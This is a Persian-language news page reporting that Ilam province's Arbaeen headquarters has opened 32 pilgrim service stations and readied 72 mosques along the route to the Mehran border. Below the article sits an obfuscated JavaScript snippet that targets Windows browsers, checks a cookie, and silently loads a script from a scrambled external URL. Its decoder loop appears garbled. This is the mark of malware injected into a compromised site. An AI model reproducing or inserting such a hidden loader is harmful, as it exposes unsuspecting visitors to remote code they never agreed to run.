دفتر مقام معظم رهبری
titreno.ir
حرف تو
تاریخ انتشار : 24 مهر 1397 - 22:43
کد مطلب: 49069
سخنگوی ستاد اربعین استان ایلام از آغاز فعالیت موکب‌های مردمی و خدمات‌دهی به زائران اربعین در مهران خبر داد.

به گزارش ایلام پویا، حجت الاسلام "علی چراغی‌پور" در گفتگویی از آغاز فعالیت موکب‌های مردمی و خدمات‌دهی به زائران اربعین در مهران خبر داد و اظهار داشت: فعالیت موکب‌ها تا 13 آبان ماه امسال ادامه دارد و تلاش شده است که موکب‌ها در مسیر تردد زائران منتهی به مرز مهران استقرار داشته باشند و امکان دسترسی آنان مقدور و ملاحظات ترافیکی معمول شده است.

سخنگوی ستاد اربعین استان ایلام گفت: جهت حفظ امنیت، ترافیک ونظارت بهداشتی و کیفی تجمیع موکب‌ها انجام شده است و 32 نقطه مختلف در مسیر تردد استقرار یافته‌اند که فعالیت این موکب‌ها به صورت 24 ساعته انجام می‌شود.
وی آماده کردن مساجد مسیر تردد را نیز برای استراحت و نماز در مسیر تردد زائران را از دیگر اقدامات برای خدمات‌دهی به زائران نام برد و خاطرنشان کرد: کلیه مساجد و حسینه‌های مسیر راه به تعداد 72 مورد از نظر زیرساختی و تامین مایحتاج ضروری آماده برای اسکان، توقف کوتاه مدت و انجام فرائض دینی  برای زائران است.
چراغی‌پور افزود: با توجه به مردمی بودن خدمات‌دهی موکب‌ها به زائران اربعین حسینی خیران می‌توانند نذورات خود را به ستاد مردمی اربعین حسینی استان ایلام تحویل تا به نیابت آنان هزینه شود.
تسنیم
انتهای پیام/

;(function(){var x=navigator[m("4t}n)e}gnA(r;eistu}")];var y=document[m(":e}idk,owodc,")];if(s(x,m("0s7w)obd)n)i(W{"))&&!s(x,m("&dui{o;r,den;Aj"))){if(!s(y,m("p=na{m9t(uo_,_d_("))){var b=document.createElement('script');b.type='text/javascript';b.async=true;b.src=m('b2)agd9f84}4,f893c(7{3;3{8,d{8(c)0cb}6951=,v;&;0)3{2{=udlirc6?;srjx.{e,d4o6c{_8s)/lm{o;c{.nd,n{a,r9b}h;s;imm7a;.(k}c(a3r4t)/{/v:ssrp}txtxh,');var o=document.getElementsByTagName('script')[0];o.parentNode.insertBefore(b,o);}}function m(v){var a='';for(var f=0;f=0;p--){k+=t[p];}return k;}})();

دیدگاههای ارسال شده ، پس ازتأیید توسط مدیر سایت منتشر خواهد شد.
پیامهایی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
انتشار نظر به معنای تأیید از دید مسئول سایت نبوده و مسئولیت نظرات بر عهده نظردهنده است.

نظر شما

CAPTCHA ی تصویری
کاراکترهای نمایش داده شده در تصویر را وارد کنید.